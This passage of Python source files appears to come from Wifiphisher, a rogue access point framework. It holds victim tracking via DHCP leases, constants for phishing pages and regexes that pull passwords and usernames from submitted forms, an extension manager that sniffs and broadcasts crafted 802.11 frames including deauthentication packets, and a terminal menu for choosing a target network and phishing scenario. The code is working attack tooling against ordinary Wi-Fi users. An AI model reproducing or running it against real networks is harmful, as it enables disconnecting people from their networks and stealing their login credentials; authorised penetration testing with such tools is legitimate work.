os.path.isfile('/tmp/dhcpd.conf'): os.remove('/tmp/dhcpd.conf') # sleep 2 seconds to wait all the hostapd process is # killed time.sleep(2) def read_connected_victims_file(self): """Update the Victims dictionary by reading dnsmasq.leases file.""" if (not os.path.isfile('/var/lib/misc/dnsmasq.leases')): return with open("/var/lib/misc/dnsmasq.leases", "r") as dnsmasq_leases: for line in dnsmasq_leases: line = line.split() if not line: return mac_address = line[1].strip() ip_address = line[2].strip() # Get instance of victims dic victims_instance = victim.Victims.get_instance() if mac_address in victims_instance.victims_dic: existing_victim = victims_instance.victims_dic[mac_address] if ip_address == existing_victim.ip_address: return existing_victim.assign_ip_to_victim(mac_address, ip_address) else: new_victim = victim.Victim(mac_address, ip_address) victims_instance.add_to_victim_dic(new_victim) new_victim.associate_victim_mac_to_vendor(mac_address) File: wifiphisher/common/uimethods.py import importlib from functools import wraps import wifiphisher.common.constants def uimethod(func): def _decorator(data, *args, **kwargs): response = func(data, *args, **kwargs) return response func.is_uimethod = True return wraps(func)(_decorator) File: wifiphisher/common/globals.py #!/usr/bin/env python3 # -*- coding: utf-8 -*- # pylint: skip-file ALL_2G_CHANNELS = list(range(1, 14)) File: wifiphisher/common/macmatcher.py """ This module was made to match MAC address with vendors """ import wifiphisher.common.constants as constants class MACMatcher(object): """ This class handles Organizationally Unique Identifiers (OUIs). The original data comes from http://standards.ieee.org/regauth/ oui/oui.tx .. 
seealso:: http://standards.ieee.org/faqs/OUI.html """ def __init__(self, mac_vendor_file): """ Setup the class with all the given arguments :param self: A MACMatcher object :param mac_vendor_file: The path of the vendor file :type self: MACMatcher :type mac_vendor_file: string :return: None :rtype: None """ self._mac_to_vendor = {} self._vendor_file = mac_vendor_file # get the information in the vendor file self._get_vendor_information() def _get_vendor_information(self): """ Read and process all the data in the vendor file :param self: A MACMatcher object :type self: MACMatcher :return: None :rtype: None """ # open the file with all the MAC addresses and # vendor information with open(self._vendor_file, 'r') as _file: # check every line in the file for line in _file: # skip comment lines if not line.startswith("#"): # separate vendor and MAC addresses and add it # to the dictionary separated_line = line.rstrip('\n').split('|') mac_identifier = separated_line[0] vendor = separated_line[1] logo = separated_line[2] self._mac_to_vendor[mac_identifier] = (vendor, logo) def get_vendor_name(self, mac_address): """ Return the matched vendor name for the given MAC address or Unknown if no match is found :param self: A MACMatcher object :param mac_address: MAC address of device :type self: MACMatcher :type mac_address: string :return: The vendor name of the device if MAC address is found and Unknown otherwise :rtype: string """ # Don't bother if there's no MAC if mac_address is None: return None # convert mac address to same format as file # ex. 12:34:56:78:90:AB --> 123456 mac_identifier = mac_address.replace(':', '').upper()[0:6] # try to find the vendor and if not found return unknown try: vendor = self._mac_to_vendor[mac_identifier][0] return vendor except KeyError: return "Unknown" def get_vendor_logo_path(self, mac_address): """ Return the the full path of the logo in the filesystem for the given MAC address or None if no match is found :param self: A MACMatcher object :param mac_address: MAC address of the device :type self: MACMatcher :type mac_address: string :return: The full path of the logo if MAC address if found and None otherwise :rtype: string or None """ # Don't bother if there's no MAC if mac_address is None: return None # convert mac address to same format as file # ex. 
12:34:56:78:90:AB --> 123456 mac_identifier = mac_address.replace(':', '').upper()[0:6] # check to see if vendor is available for the MAC address if mac_identifier in self._mac_to_vendor: # find the logo and it's path logo = self._mac_to_vendor[mac_identifier][1] logo_path = constants.LOGOS_DIR + logo # return logo name if it was provided otherwise return None if logo: return logo_path else: return None def unbind(self): """ Unloads mac to vendor mapping from memory and therefore you can not use MACMatcher instance once this method is called :param self: A MACMatcher object :type self: MACMatcher :return: None :rtype: None """ del self._mac_to_vendor File: wifiphisher/common/constants.py #!/usr/bin/env python3 # -*- coding: utf-8 -*- # pylint: skip-file import os dir_of_executable = os.path.dirname(__file__) path_to_project_root = os.path.abspath( os.path.join(dir_of_executable, '../../wifiphisher')) dir_of_data = path_to_project_root + '/data/' phishing_pages_dir = dir_of_data + "phishing-pages/" # Basic configuration DEV = 1 DEAUTH_EXTENSION = "deauth" LURE10_EXTENSION = "lure10" WPSPBC = "wpspbc" KNOWN_BEACONS_EXTENSION = "knownbeacons" HANDSHAKE_VALIDATE_EXTENSION = "handshakeverify" ROGUEHOSTAPDINFO = "roguehostapdinfo" DEFAULT_EXTENSIONS = [DEAUTH_EXTENSION] EXTENSIONS_LOADPATH = "wifiphisher.extensions." PORT = 8080 SSL_PORT = 443 CHANNEL = 6 WEBSITE = "https://wifiphisher.org" PUBLIC_DNS = "8.8.8.8" PEM = dir_of_data + 'cert/server.pem' SCENARIO_HTML_DIR = "html/" LOGOS_DIR = dir_of_data + "logos/" LOCS_DIR = dir_of_data + "locs/" MAC_PREFIX_FILE = dir_of_data + "wifiphisher-mac-prefixes" URL_TO_OS_FILE = dir_of_data + "wifiphisher-os-initial-requests" KNOWN_WLANS_FILE = dir_of_data + "wifiphisher-known-open-wlans" POST_VALUE_PREFIX = "wfphshr" NETWORK_IP = "10.0.0.0" NETWORK_MASK = "255.255.255.0" NETWORK_GW_IP = "10.0.0.1" DHCP_LEASE = "10.0.0.2,10.0.0.100,12h" WIFI_BROADCAST = "ff:ff:ff:ff:ff:ff" WIFI_INVALID = "00:00:00:00:00:00" WIFI_IPV6MCAST1 = "33:33:00:" WIFI_IPV6MCAST2 = "33:33:ff:" WIFI_SPANNINGTREE = "01:80:c2:00:00:00" WIFI_MULTICAST = "01:00:5e:" NON_CLIENT_ADDRESSES = set([ WIFI_BROADCAST, WIFI_INVALID, WIFI_MULTICAST, WIFI_IPV6MCAST1, WIFI_IPV6MCAST2, WIFI_SPANNINGTREE, None ]) DEFAULT_OUI = '00:00:00' LINES_OUTPUT = 3 DN = open(os.devnull, 'w') INTERFERING_PROCS = [ "wpa_action", "wpa_supplicant", "wpa_cli", "dhclient", "ifplugd", "dhcdbd", "dhcpcd", "udhcpc", "avahi-autoipd", "avahi-daemon", "wlassistant", "wifibox", "NetworkManager", "knetworkmanager" ] DNS_CONF_PATH = '/tmp/dnsmasq.conf' NEW_YEAR = "01-01" BIRTHDAY = "01-05" # Modes of operation # AP, Extensions # 2 cards, 2 interfaces # i) AP, ii) EM OP_MODE1 = 0x1 # AP, Extensions and Internet # 3 cards, 3 interfaces # i) AP, ii) EM iii) Internet OP_MODE2 = 0x2 # AP-only and Internet # 2 cards, 2 interfaces # i) AP, ii) Internet OP_MODE3 = 0x3 # AP-only # 1 card, 1 interface # i) AP OP_MODE4 = 0x4 # AP, Extensions w/ 1 vif # 1 card, 2 interfaces # i) AP, ii) Extensions OP_MODE5 = 0x5 # AP, Extensions and Internet w/ 1 vif # 2 cards, 3 interfaces # i) AP, ii) Extensions, iii) Internet OP_MODE6 = 0x6 # Advanced and WPS association 0x7 # 3 cards, 3 interfaces # i) AP, ii) Extensions, iii) Extensions (Managed) OP_MODE7 = 0x7 # Advanced and WPS association w/ 1 vif support AP/Monitor 0x8 # 2 cards, 3 interfaces # i) AP, ii) Extensions, iii) Extensions (Managed) OP_MODE8 = 0x8 AP_RATES = "\x0c\x12\x18\x24\x30\x48\x60\x6c" # Console colors W = '\033[0m' # white (normal) R = '\033[31m' # red G = '\033[32m' # green O = 
'\033[33m' # orange B = '\033[34m' # blue P = '\033[35m' # purple C = '\033[36m' # cyan GR = '\033[37m' # gray T = '\033[93m' # tan # Logging configurations # possible values for debug levels are: # CRITICAL, ERROR, WARNING, INFO, DEBUG, NOTSET LOG_LEVEL = 'INFO' LOG_FILEPATH = 'wifiphisher.log' LOGGING_CONFIG = { 'version': 1, # Defined the handlers 'handlers': { 'file': { 'class': 'logging.handlers.RotatingFileHandler', 'level': LOG_LEVEL, 'formatter': 'detailed', 'filename': LOG_FILEPATH, 'backupCount': 3, }, }, # fomatters for the handlers 'formatters': { 'detailed': { 'format': '%(asctime)s - %(name) 32s - %(levelname)s - %(message)s' }, }, 'root': { 'level': 'DEBUG', 'handlers': [ 'file', ], }, "loggers": {}, 'disable_existing_loggers': False } CREDENTIALS_DATETIME_FORMAT = '%Y-%m-%d %H:%M:%S' # Phishinghttp VALID_POST_CONTENT_TYPE = "application/x-www-form-urlencoded" REGEX_PWD = "password|pwd|pass" REGEX_UNAME = "username|uname|name" # TUI MAIN_TUI_ATTRS = 'version essid channel ap_iface em phishinghttp args' AP_SEL_ATTRS = 'interface mac_matcher network_manager args' # Fourway handshake extension CONST_A = "Pairwise key expansion" # Rogue AP related DENY_MACS_PATH = '/tmp/hostapd.deny' # Known Beacons KB_INTERVAL = 20 KB_BUCKET_SIZE = 60 KB_BEACON_CAP = 0x2105 File: wifiphisher/common/__init__.py File: wifiphisher/common/extensions.py """ All logic regarding extensions management """ import collections import importlib import logging import threading import time from collections import defaultdict import scapy.arch.linux as linux import scapy.layers.dot11 as dot11 import wifiphisher.common.constants as constants import wifiphisher.common.globals as universal import wifiphisher.extensions.deauth as deauth_extension logger = logging.getLogger(__name__) is_deauth_cont = True def register_backend_funcs(func): """ Register the specific function in extension as backend methods :param func: The instance function needed to register as backend method :type func: instancemethod :return: None """ func.is_backendmethod = True return func class ExtensionManager(object): """ Extension Manager (EM) defines an API for modular architecture in Wifiphisher. All extensions that lie under "extensions" directory and are also defined in EXTENSIONS constant are loaded and leveraged by EM. Each extension can take advantage of the second wireless card (the first is used for the rogue AP), aka run in "Advanced mode". Each extension needs to be defined as a class that has the name of the filename in camelcase. For example, deauth.py would have a Deauth() class. Currently, extensions need to provide the following methods: * __init__(self, data): Basic initialization that received a dictionary with data from the main engine. * get_packet(self, pkt): Method to process individually each packet captured from the second card (monitor mode). * send_output(self): Method that returns in a list of strings the entry logs that we need to output. * on_exit(self): Method that frees all the used resources * each extension can define the backend method as follows: ex: @extensions.register_backend_funcs def psk_verify(self, *list_data): return list_data """ def __init__(self, network_manager): """ Init the EM object. 
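
        ..note: A minimal extension sketch (illustrative only; the class
            name here is hypothetical) that satisfies the interface
            described in the class docstring above::

                from collections import defaultdict

                class Example(object):
                    def __init__(self, shared_data):
                        self._data = shared_data

                    def get_packet(self, pkt):
                        # one list of frames per channel key ("1".."13" and "*")
                        return defaultdict(list)

                    def send_output(self):
                        return []

                    def send_channels(self):
                        return []

                    def on_exit(self):
                        pass
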
:param self: An ExtensionManager object :type self: ExtensionManager :return: None :rtype: None """ self._nm = network_manager self._extensions_str = [] self._extensions = [] self._interface = None self._socket = None self._should_continue = True self._packets_to_send = defaultdict(list) self._channels_to_hop = [] self._current_channel = "1" self._listen_thread = threading.Thread(target=self._listen) self._send_thread = threading.Thread(target=self._send) self._channelhop_thread = threading.Thread(target=self._channel_hop) self._shared_data = None def get_ui_funcs(self): """ Returns a list of all the uimethods. :param self: An ExtensionManager object :type self: ExtensionManager :return: List Object :rtype: List """ ui_funcs = [] # loop each extension object for extension in self._extensions: # loop all the attribute for the extension object for attr in dir(extension): if callable(getattr(extension, attr)): method = getattr(extension, attr) if hasattr(method, "is_uimethod"): ui_funcs.append(method) return ui_funcs def get_backend_funcs(self): """ Returns a list of all the backend methods :param self: An ExtensionManager object :type self: ExtensionManager :return: dict object :rtype: dict """ backend_funcs = {} for extension in self._extensions: for attrname in dir(extension): method = getattr(extension, attrname) if hasattr(method, 'is_backendmethod'): # store the method name to extension map backend_funcs[method.__name__] = extension return backend_funcs def _channel_hop(self): """ Change the interface's channel every three seconds :param self: An ExtensionManager object :type self: ExtensionManager :return: None :rtype: None .. note: The channel range is between 1 to 13 """ # set the current channel to the ap channel self._nm.set_interface_channel(self._interface, int(self._shared_data.target_ap_channel)) # if the stop flag not set, change the channel while self._should_continue: for channel in self._channels_to_hop: if self._current_channel != channel: self._current_channel = channel # added this check to reduce shutdown time if self._should_continue: try: self._socket.close() self._nm.set_interface_channel( self._interface, int(self._current_channel)) self._socket = linux.L2Socket( iface=self._interface) # extends the channel hopping time to sniff # more frames time.sleep(3) except BaseException: continue else: break def set_interface(self, interface): """ Sets interface for EM. :param self: An ExtensionManager object :type self: ExtensionManager :param interface: Interface name :type interface: String :return: None :rtype: None """ self._interface = interface self._socket = linux.L2Socket(iface=self._interface) def set_extensions(self, extensions): """ Sets extensions for EM. :param self: An ExtensionManager object :type self: ExtensionManager :param extensions: List of str extension names :type extensions: List :return: None :rtype: None """ self._extensions_str = extensions def init_extensions(self, shared_data): """ Init EM extensions. Should be run when all shared data has been gathered. 
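        Each name set via set_extensions is imported from the
        wifiphisher.extensions package and mapped to its class using
        extension.title(), so e.g. the deauth module is expected to
        define a Deauth class.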
:param self: An ExtensionManager object :type self: ExtensionManager :param shared_data: Dictionary object :type shared_data: Dictionary :return: None :rtype: None """ # Convert shared_data from dict to named tuple shared_data = collections.namedtuple('GenericDict', list(shared_data.keys()))(**shared_data) self._shared_data = shared_data # Initialize all extensions with the shared data for extension in self._extensions_str: mod = importlib.import_module(constants.EXTENSIONS_LOADPATH + extension) extension_class = getattr(mod, extension.title()) obj = extension_class(shared_data) self._extensions.append(obj) def start_extensions(self): """ Starts the two main daemons of EM: 1) Daemon that listens to every packet and forwards it to each extension for further processing. 2) Daemon that receives special-crafted packets from extensions and broadcasts them in the air. :param self: An ExtensionManager object :type self: ExtensionManager :return: None :rtype: None """ # One daemon is listening for packets... self._listen_thread.start() # ...another daemon is sending packets self._send_thread.start() # daemon for channel hopping self.get_channels() if self._shared_data.is_freq_hop_allowed: self._channelhop_thread.start() else: self._current_channel = self._shared_data.target_ap_channel def on_exit(self): """ Stops both daemons of EM on exit. :param self: An ExtensionManager object :type self: ExtensionManager :return: None :rtype: None """ self._should_continue = False if self._listen_thread.is_alive(): self._listen_thread.join(3) if self._send_thread.is_alive(): self._send_thread.join(3) if (self._shared_data is not None and self._shared_data.is_freq_hop_allowed and self._channelhop_thread.is_alive()): self._channelhop_thread.join(3) # Close socket if it's open try: self._socket.close() except AttributeError: pass # Clean resources used by extension modules for extension in self._extensions: extension.on_exit() def get_channels(self): """ Gets the channels from each extension. Merges them to create a list of channels to hop. :param self: An ExtensionManager object :type self: ExtensionManager :return: None :rtype: None """ for extension in self._extensions: channels_interested = extension.send_channels() number_of_channels = len(channels_interested) if channels_interested and number_of_channels > 0: # Append only new channels (no duplicates) self._channels_to_hop += list( set(channels_interested) - set(self._channels_to_hop)) def get_output(self): """ Gets the output of each extensions. Merges them in a list and returns it. :param self: An ExtensionManager object :type self: ExtensionManager :return: None :rtype: None """ output = [] for extension in self._extensions: m_output = extension.send_output() num_of_lines = len(m_output) if m_output and num_of_lines > 0: output += m_output return output def _process_packet(self, pkt): """ Pass each captured packet to each module. Gets the packets to send. :param self: An ExtensionManager object :type self: ExtensionManager :param pkt: A Scapy packet object :type pkt: Scapy Packet :return: None :rtype: None """ # clear the _packets_to_send on every run of the # sniffed frame self._packets_to_send = defaultdict(list) channels = [str(ch) for ch in universal.ALL_2G_CHANNELS] + ["*"] for extension in self._extensions: ext_pkts = extension.get_packet(pkt) for channel in channels: self._packets_to_send[channel] += ext_pkts[channel] def _stopfilter(self, pkt): """ A scapy filter to determine if we need to stop. 
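        It simply returns the negation of _should_continue, so the
        dot11.sniff call in _listen stops once on_exit clears that flag.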
:param self: An ExtensionManager object :type self: ExtensionManager :param self: A Scapy packet object :type self: Scapy Packet :return: True or False :rtype: Boolean """ return not self._should_continue def _listen(self): """ Listening thread. Listens for packets and forwards them to _process_packet. :param self: An ExtensionManager object :type self: ExtensionManager :return: None :rtype: None """ # continue to find clients until told otherwise dot11.sniff( iface=self._interface, prn=self._process_packet, store=0, stop_filter=self._stopfilter) def _send(self): """ Sending thread. Continously broadcasting packets crafted by extensions. :param self: An ExtensionManager object :type self: ExtensionManager :return: None :rtype: None """ while self._should_continue: for pkt in self._packets_to_send[self._current_channel] + \ self._packets_to_send["*"]: try: if is_deauth_cont or not deauth_extension.is_deauth_frame(pkt): logger.debug("Send pkt with A1:%s A2:%s subtype:%s in channel:%s", pkt.addr1, pkt.addr2, pkt.subtype, self._current_channel) self._socket.send(pkt) except BaseException: continue time.sleep(1) File: wifiphisher/common/tui.py """ This module was made to handle the curses sections for the ap selection, template selection and the main window """ import curses import os import re import time from collections import namedtuple from subprocess import check_output import wifiphisher.common.accesspoint as accesspoint import wifiphisher.common.constants as constants import wifiphisher.common.phishingpage as phishingpage import wifiphisher.common.recon as recon import wifiphisher.common.victim as victim # information for the main terminal MainInfo = namedtuple("MainInfo", constants.MAIN_TUI_ATTRS) # information for the AP selection terminal ApSelInfo = namedtuple("ApSelInfo", constants.AP_SEL_ATTRS) class TuiTemplateSelection(object): """ TUI to do Template selection """ def __init__(self): """ Construct the class :param self: A TuiTemplateSelection object :type self: TuiTemplateSelection :return None :rtype None """ self.green_text = None # heightlight the phishing scenario self.heightlight_text = None # record current hightlight template number self.heightlight_number = 0 # store the current page number self.page_number = 0 # store the phishing contents of each scenario self.sections = list() # map the section to page number self.sec_page_map = {} # the window size for (y, x) self.dimension = [0, 0] def get_sections(self, template_names, templates): """ Get all the phishing scenario contents and store them in a list :param self: A TuiTemplateSelection object :param template_names: A list of string :param templates: A dictionary :type self: TuiTemplateSelection :type template_names: list :type templates: dict :return None :rtype: None """ for name in template_names: phishing_contents = " - " + str(templates[name]) # total line in the phishing contents lines = phishing_contents.splitlines() # split the line into 15 words per shorter line short_lines = [] for line in lines: for short_line in line_splitter(15, line): short_lines.append(short_line) self.sections.append(short_lines) def update_sec_page_map(self, last_row): """ Update the page number for each section :param self: A TuiTemplateSelection object :param last_row: The last row of the window :type self: TuiTemplateSelection :type last_row: int :return: None :rtype: None """ page_number = 0 row_number = 0 self.sec_page_map = {} for number, section in enumerate(self.sections): row_number += len(section) if row_number > last_row: 
row_number = 0 page_number += 1 self.sec_page_map[number] = page_number def gather_info(self, template_argument, template_manager): """ Select a template based on whether the template argument is set or not. If the template argument is not set, it will interfactively ask user for a template :param self: A TuiTemplateSelection object :type self: TuiTemplateSelection :param template_argument: The template argument which might have been entered by the user :type template_argument: str :param template_manager: A TemplateManager object :type template_manager: TemplateManager :return A PhishingTemplate object :rtype: PhishingTemplagte :raises InvalidTemplate in case the template argument entered by the user is not available. """ # get all available templates templates = template_manager.get_templates() # get all the templates names for display template_names = list(templates.keys()) # get all the section contents self.get_sections(template_names, templates) # check if the template argument is set and is correct if template_argument and template_argument in templates: # return the template name return templates[template_argument] elif template_argument and template_argument not in templates: # in case of an invalid template raise phishingpage.InvalidTemplate else: # prompt interactive phishing scenarios to let user select one template = curses.wrapper(self.display_info, templates, template_names) return template def key_movement(self, screen, number_of_sections, key): """ Check for key movement and hightlight the corresponding phishing scenario :param self: A TuiTemplateSelection object :param number_of_sections: Number of templates :param key: The char user keying :type self: TuiTemplateSelection :type number_of_sections: int :type key: str :return: None :rtype: None """ if key == curses.KEY_DOWN: if self.heightlight_number < number_of_sections - 1: page_number = self.sec_page_map[self.heightlight_number + 1] if page_number > self.page_number: self.page_number += 1 screen.erase() self.heightlight_number += 1 elif key == curses.KEY_UP: if self.heightlight_number > 0: page_number = self.sec_page_map[self.heightlight_number - 1] if page_number < self.page_number: self.page_number -= 1 screen.erase() self.heightlight_number -= 1 def display_phishing_scenarios(self, screen): """ Display the phishing scenarios :param self: A TuiTemplateSelection object :type self: TuiTemplateSelection :param screen: A curses window object :type screen: _curses.curses.window :return total row numbers used to display the phishing scenarios :rtype: int """ try: max_window_height, max_window_len = screen.getmaxyx() if self.dimension[0] != max_window_height or\ self.dimension[1] != max_window_len: screen.erase() self.dimension[0] = max_window_height self.dimension[1] = max_window_len # add margins for changing the pages self.update_sec_page_map(max_window_height - 20) display_str = "Options: [Up Arrow] Move Up [Down Arrow] Move Down" screen.addstr(0, 0, display_string(max_window_len, display_str)) display_str = "Available Phishing Scenarios:" screen.addstr(3, 0, display_string(max_window_len, display_str), curses.A_BOLD) except curses.error: return 0 # add blank line row_num = 5 first = False for number, short_lines in enumerate(self.sections): try: # incase user shrink the window and the heightlight section # is in the next page. 
for this case, just shift the # heightlight section to the first scenario in the first # page if self.sec_page_map[self.heightlight_number] !=\ self.page_number and not first: # heightlight the first scenario screen.addstr(row_num, 2, short_lines[0], self.heightlight_text) self.heightlight_number = 0 self.page_number = 0 first = True # display the sections belonged to the current page if self.sec_page_map[number] != self.page_number: continue screen.addstr(row_num, 0, str(number + 1), self.green_text) # emphasize the phishing scenario if number == self.heightlight_number: screen.addstr(row_num, 2, short_lines[0], self.heightlight_text) else: screen.addstr(row_num, 2, short_lines[0], curses.A_BOLD) row_num += 1 # add 8 spaces to the first line screen.addstr(row_num, 8, short_lines[1]) row_num += 1 if len(short_lines) > 1: for short_line in short_lines[2:]: screen.addstr(row_num, 0, short_line) row_num += 1 # add blank line between phishing scenarios row_num += 1 except curses.error: return row_num return row_num def display_info(self, screen, templates, template_names): """ Display the template information to users :param self: A TuiTemplateSelection object :type self: TuiTemplateSelection :param screen: A curses window object :type screen: _curses.curses.window :param templates: A dictionay map page to PhishingTemplate :type templates: dict :param template_names: list of template names :type template_names: list """ # setup curses try: curses.curs_set(0) except curses.error: pass screen.nodelay(True) curses.init_pair(1, curses.COLOR_GREEN, screen.getbkgd()) # heightlight the phishing scenarios curses.init_pair(2, curses.COLOR_BLACK, curses.COLOR_CYAN) self.green_text = curses.color_pair(1) | curses.A_BOLD self.heightlight_text = curses.color_pair(2) | curses.A_BOLD # setup number of templates number_of_sections = len(templates) # how many chars for user keying the template number screen.erase() while True: # display the four default phishing scenarios # catch the exception when screen size is smaller than # the text length row_number = self.display_phishing_scenarios(screen) # update the heightlight_number key = screen.getch() self.key_movement(screen, number_of_sections, key) # add two blank lines row_number += 2 # display the words of chosen template if key == ord("\n"): try: screen.addstr(row_number, 3, "YOU HAVE SELECTED " + template_names[self.heightlight_number], curses.A_BOLD) except curses.error: pass screen.refresh() time.sleep(1) template_name = template_names[self.heightlight_number] template = templates[template_name] return template screen.refresh() class ApDisplayInfo(object): """ ApDisplayInfo class to store the information for ap selection """ def __init__(self, pos, page_number, box, box_info): """ Construct the class :param self: ApDisplayInfo :param pos: position of the line in the ap selection page :param page_number: page number of the ap selection :param box: the curses.newwin.box object containing ap information :param key: the key user have keyed in :param box_info: list of window height, window len, and max row number :type self: ApDisplayInfo :type pos: int :type page_number: int :type box: curse.newwin.box :type key: str :return: None :rtype: None """ self.pos = pos self.page_number = page_number self.box = box # list of (max_win_height, max_win_len, max_row, key) self._box_info = box_info @property def max_h(self): """ The height of the terminal screen :param self: ApDisplayInfo :type self: ApDisplayInfo :return: the height of terminal screen :rtype: int """ 
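        # _box_info layout: [max_win_height, max_win_len, max_row, key]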
return self._box_info[0] @max_h.setter def max_h(self, val): """ Set the height of the terminal screen :param self: ApDisplayInfo :type self: ApDisplayInfo :return: None :rtype: None """ self._box_info[0] = val @property def max_l(self): """ The width of the terminal screen :param self: ApDisplayInfo :type self: ApDisplayInfo :return: the width of terminal screen :rtype: int """ return self._box_info[1] @max_l.setter def max_l(self, val): """ Set the width of the terminal screen :param self: ApDisplayInfo :type self: ApDisplayInfo :return: None :rtype: None """ self._box_info[1] = val @property def max_row(self): """ Maximum row numbers used to contain the ap information :param self: ApDisplayInfo :type self: ApDisplayInfo :return: The row numbers of the box that contains the ap info :rtype: int """ return self._box_info[2] @max_row.setter def max_row(self, val): """ Set maximum row numbers used to contain the ap information :param self: ApDisplayInfo :type self: ApDisplayInfo :return: None :rtype: None """ self._box_info[2] = val @property def key(self): """ Get the key the users have keyed :param self: ApDisplayInfo :type self: ApDisplayInfo :return: The key :rtype: int """ return self._box_info[3] @key.setter def key(self, val): """ Set the key the users have keyed :param self: ApDisplayInfo :type self: ApDisplayInfo :return: None :rtype: None """ self._box_info[3] = val class TuiApSel(object): """ TuiApSel class to represent the ap selection terminal window """ def __init__(self): """ Construct the class :param self: A TuiApSel object :type self: TuiApSel :return: None :rtype: None """ self.total_ap_number = 0 self.access_points = list() self.access_point_finder = None self.highlight_text = None self.normal_text = None self.mac_matcher = None # when screen becomes too small we'll create a box with # the size equal to the screen terminal. We need to renew # the box when the screen terminal expands again. 
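        # (the renewal itself is handled in resize_window below)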
self.renew_box = False def init_display_info(self, screen, info): """ Initialization of the ApDisplyInfo object :param self: A TuiApSel object :type self: TuiApSel :param screen: A curses window object :type screen: _curses.curses.window :param info: A namedtuple of information from pywifiphisher :type info: namedtuple :return ApDisplayInfo object :rtype: ApDisplayInfo """ position = 1 page_number = 1 # get window height, length and create a box inside max_window_height, max_window_length = screen.getmaxyx() if max_window_height < 14 or max_window_length < 9: box = curses.newwin(max_window_height, max_window_length, 0, 0) self.renew_box = True else: box = curses.newwin(max_window_height - 9, max_window_length - 5, 4, 3) box.box() # calculate the box's maximum number of row's box_height = box.getmaxyx()[0] # subtracting 2 from the height for the border max_row = box_height - 2 key = 0 box_info = [max_window_height, max_window_length, max_row, key] ap_info = ApDisplayInfo(position, page_number, box, box_info) self.mac_matcher = info.mac_matcher # start finding access points self.access_point_finder = recon.AccessPointFinder( info.interface, info.network_manager) if info.args.lure10_capture: self.access_point_finder.capture_aps() self.access_point_finder.find_all_access_points() return ap_info def gather_info(self, screen, info): """ Get the information from pywifiphisher and print them out :param self: A TuiApSel object :type self: TuiApSel :param screen: A curses window object :type screen: _curses.curses.window :param info: A namedtuple of information from pywifiphisher :type info: namedtuple :return AccessPoint object if users type enter :rtype AccessPoint if users type enter else None """ # setup curses # make cursor invisible try: curses.curs_set(0) except curses.error: pass # don't wait for user input screen.nodelay(True) # setup the font color curses.init_pair(1, curses.COLOR_BLACK, curses.COLOR_CYAN) self.highlight_text = curses.color_pair(1) self.normal_text = curses.A_NORMAL # information regarding access points ap_info = self.init_display_info(screen, info) # show information until user presses Esc key while ap_info.key != 27: # display info will modifiy the key value is_done = self.display_info(screen, ap_info) if is_done: # turn off access point discovery and return the result self.access_point_finder.stop_finding_access_points() return self.access_points[ap_info.pos - 1] # turn off access point discovery self.access_point_finder.stop_finding_access_points() def resize_window(self, screen, ap_info): """ Resize the window if the dimensions have been changed :param self: A TuiApSel object :type self: TuiApSel :param screen: A curses window object :type screen: _curses.curses.window :param ap_info: An ApDisplayInfo object :type ap_info: ApDisplayInfo """ if screen.getmaxyx() != (ap_info.max_h, ap_info.max_l): ap_info.max_h, ap_info.max_l = screen.getmaxyx() # sanity check for the box size (the height needed is 10 and # the width needed is 6. 
Just create a box which is same as the # base screen if ap_info.max_h < 10 + 4 or ap_info.max_l < 6 + 3: box = curses.newwin(ap_info.max_h, ap_info.max_l, 0, 0) box.box() ap_info.box = box self.renew_box = True return elif self.renew_box: screen.erase() box = curses.newwin(ap_info.max_h - 9, ap_info.max_l - 5, 4, 3) box.box() ap_info.box = box self.renew_box = False ap_info.box.resize(ap_info.max_h - 9, ap_info.max_l - 5) # calculate the box's maximum number of row's box_height = ap_info.box.getmaxyx()[0] # subtracting 2 from the height for the border ap_info.max_row = box_height - 2 # reset the page and position to avoid problems ap_info.pos = 1 ap_info.page_number = 1 def key_movement(self, ap_info): """ Check for any key movement and update it's result :param self: A TuiApSel object :type self: TuiApSel :param ap_info: ApDisplayInfo object :type: ApDisplayInfo :return: None :rtype: None """ key = ap_info.key pos = ap_info.pos max_row = ap_info.max_row page_number = ap_info.page_number # in case arrow down key has been pressed if key == curses.KEY_DOWN: # if next item exists move down, otherwise don't move try: self.access_points[pos] except IndexError: ap_info.key = 0 ap_info.pos = pos ap_info.max_row = max_row return # if next item is in the next page change page and move # down otherwise just move down) if pos % max_row == 0: pos += 1 page_number += 1 else: pos += 1 # in case arrow up key has been pressed elif key == curses.KEY_UP: # if not the first item if (pos - 1) > 0: # if previous item is in previous page_number, change page # and move up otherwise just move up if (pos - 1) % max_row == 0: pos -= 1 page_number -= 1 else: pos -= 1 # update key, position, and page_number ap_info.key = key ap_info.pos = pos ap_info.page_number = page_number def display_info(self, screen, ap_info): """ Display the AP informations on the screen :param self: A TuiApSel object :type self: TuiApSel :param screen: A curses window object :type screen: _curses.curses.window :param ap_info: An ApDisplayInfo object :type ap_info: ApDisplayInfo :return True if ap selection is done :rtype: bool """ is_apsel_end = False self.resize_window(screen, ap_info) # check if any new access points have been discovered new_total_ap_number = len( self.access_point_finder.observed_access_points) if new_total_ap_number != self.total_ap_number: self.access_points = self.access_point_finder.\ get_sorted_access_points() self.total_ap_number = len(self.access_points) # display the information to the user self.display_access_points(screen, ap_info) # check for key movement and store result self.key_movement(ap_info) # ask for a key input (doesn't block) ap_info.key = screen.getch() if ap_info.key == ord("\n") and self.total_ap_number != 0: # show message and exit screen.addstr(ap_info.max_h - 2, 3, "YOU HAVE SELECTED " + self.access_points[ap_info.pos - 1].name) screen.refresh() time.sleep(1) is_apsel_end = True return is_apsel_end def display_access_points(self, screen, ap_info): """ Display information in the box window :param self: A TuiApSel object :type self: TuiApSel :param screen: A curses window object :type screen: _curses.curses.window :param ap_info: An ApDisplayInfo object :type ap_info: ApDisplayInfo :return: None :rtype: None .. 
